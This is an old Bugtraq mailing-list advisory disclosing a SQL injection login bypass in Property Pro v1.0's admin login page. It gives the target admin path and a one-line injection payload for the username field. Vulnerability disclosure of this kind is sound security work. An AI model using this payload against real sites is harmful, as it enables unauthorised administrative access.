
Date: 12 Nov 2006 17:27:53 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL
 Injection Vulnerability

*******************************************************************************
# Title  :  Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!
